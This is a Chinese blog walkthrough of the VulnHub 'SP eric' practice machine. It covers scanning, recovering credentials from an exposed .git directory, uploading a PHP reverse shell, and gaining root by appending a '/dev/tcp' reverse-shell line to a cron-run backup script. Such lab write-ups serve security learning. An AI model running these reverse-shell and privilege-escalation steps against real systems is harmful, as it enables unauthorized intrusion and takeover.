sp eric靶机

已于 2024-08-14 20:30:09 修改
阅读量328 收藏 3
点赞数 9
文章标签: 网络安全
于 2024-08-12 20:40:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/141141597
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/sp-eric,274/

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:3B:68:92'

(2)端口扫描

nmap -p- -A 192.168.254.152

(3)dirb 扫描目录,.git 源码,admin.php文件,upload目录等目录扫描

dirb http://192.168.254.152

(4)访问80端口,没有发现

(5)拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果

(6)看看 .git ,使用 githack 下载源码

python2 GitHack.py -u http://192.168.254.152/.git/

(7)查看下载的源码,发现账号密码

(8)登录 admin 页面

getshell:

(1)存在文件上传,kali 生成反弹 shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

(2)修改 IP 和端口后上传,上传后没有什么回显

(3)kali 开启监听,虽然没有回显,但是访问 /upload/php-reverse-shell.php,成功反弹 shell

提权:

(1)使用 python 提升交互性,发现没有python

python -c "import pty;pty.spawn('/bin/bash')"

(2)看一下有无 python3

which python3

(3)有 python3,那么用 python3 执行

python3 -c 'import pty;pty.spawn("/bin/bash")'

(4)在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件,查看 flag.txt,查看 backup.sh

(5)可能是计划任务,看一眼

cat /etc/crontab

(6)看了一下,backup.sh 拥有 root 权限,且我们可写可执行

(7)写入反弹 shell 的语句

echo 'bash -i >& /dev/tcp/192.168.254.129/9999 0>&1' >> backup.sh

(8)kali 开启监听

nc -lvnp 9999

(9)成功反弹 shell ,提权成功,是存在计划任务的

(10)最后在 /root 下发现一个 flag.txt

阿卡丽的神秘铺子
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sp eric靶机渗透测试
weixin_58786230的博客
08-12 240
https://www.vulnhub.com/entry/sp-eric,274/ 8、访问 /upload/php-reverse-shell.php,成功反弹 shell
SP eric靶机通关攻略
systemino的博客
04-30 834
大家好,今天给大家带来的靶机SP eric,这个靶机有两个flag,我们的目标就是把它们都找出来,flag的位置已经提供,如下: ·/root/flag.txt ·/root/eric/flag.txt 靶机下载地址:https://www.vulnhub.com/entry/sp-eric,274/ 渗透方法 ·网络扫描 ·访问HTTP服务端口 ·使用dirb遍历目录 ...
sp-eric靶机
m0_65285254的博客
08-14 298
访问 /upload/php-reverse-shell.php。存在文件上传功能,kali生成反弹shell。扫描目录发现了.git文件,存在源码泄漏。靶机ip地址为192.168.7.46。/etc/crontab 存在计划任务。在 /home/eric 下发现文件。将ip改为kali的ip 设置端口。在 /root 下发现flag文件。测试sql注入,弱口令等,无结果。拼接访问 /admin.php。可以写入反弹shell语句。将其下载到kali上读取。获得交互式shell。
CTF学习-eric靶机练习:使用git tools获取敏感目录,提权
一根火柴博客
01-28 775
Kali渗透测试-靶场练习eric 实验: Kali的IP:192.168.1.11(不同的机器配置不同) 靶机IP: 192.168.1.6(动态ip) 操作步骤 靶机下载: https://www.vulnhub.com/entry/sp-eric%2C274 下载的7z压缩包,解压后为eric.ova,还原靶机,这里我开始使用vmware还原,失败,我又安装的Virtual Box,还...
vulnhub靶机 sp eric(渗透测试详解)
2301_78721909的博客
08-12 373
vulnhub靶机 sp eric(渗透测试详解)
vulnhub靶机 sp eric【超详细】
weixin_68615160的博客
08-12 203
2、 在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件。访问 /upload/php-reverse-shell.php,成功反弹 shell。2、 拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果。3、探测靶机端口、主机、服务版本信息。3、写入反弹 shell 的语句。3、查看目录扫描的.git文件。查看一下backup.sh文件。查看下载的源码,发现账号密码。登录成功,是个文件上传页面。上传文件,kali开启监听。
vulnhub sp eric
mrwangtw的博客
02-09 569
扫描主机和端口 靶机IP:10.0.2.47 开放端口22和80 kali IP:10.0.2.4 这里一开始是看看能不能用匿名方式登录ssh,发现不可行 进入80端口 查看源代码,也没发现什么可用的信息,gobuster扫描 进入index,发现就是第一张图的内容 进入admin,也没发现什么可用的信息 使用drib再次扫描80端口 dirb http://10.0.2.47 发现有个.git的目录,使用githack下载源代码 python2 GitHack..
SP: eric
Aukum的博客
08-27 124
Vulnhub——SP: eric靶机,利用git信息泄露漏洞,使用githack工具获得用户名和密码,成功登录admin.php找到文件上传点最终上传反弹shell脚本实现getshell。
vulnhub系列:sp eric
jq_j37的博客
08-11 436
vulnhub系列:sp eric靶机,打靶文章
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8421
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“人力资源+大数据+薪酬报告+涨薪调薪”
08-27
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
java-ssm+jsp雁门关风景区宣传网站实现源码
最新发布
08-27
java-ssm+jsp雁门关风景区宣传网站 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jspspring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
springboot584科研管理系统_2byeq--.zip
08-27
随着计算机技术发展,计算机系统的应用已延伸到社会的各个领域,大量基于网络的广泛应用给生活带来了十分的便利。所以把科研管理与现在网络相结合,利用计算机搭建科研管理系统,实现科研的信息化。则对于进一步提高科研管理发展,丰富科研管理经验能起到不少的促进作用。 系统阐述的是使用科研管理系统,对于Java、B/S结构、MySql进行了较为深入的学习与应用。主要针对系统的设计,描述,实现和分析与测试方面来表明开发的过程。开发中使用了springboot框架和MySql数据库技术搭建系统的整体架构。利用这些技术结合实际需求开发了具有个人中心、用户管理、科研队伍管理、队伍信息管理、加入队伍管理、队伍申请管理、科研成果管理、项目成果申报管理、公告信息管理、资源文件管理、信息交流、系统管理等功能的系统,最后对系统进行相应的测试,测试系统有无存在问题以及测试用户权限来优化系统,最后系统达到预期目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值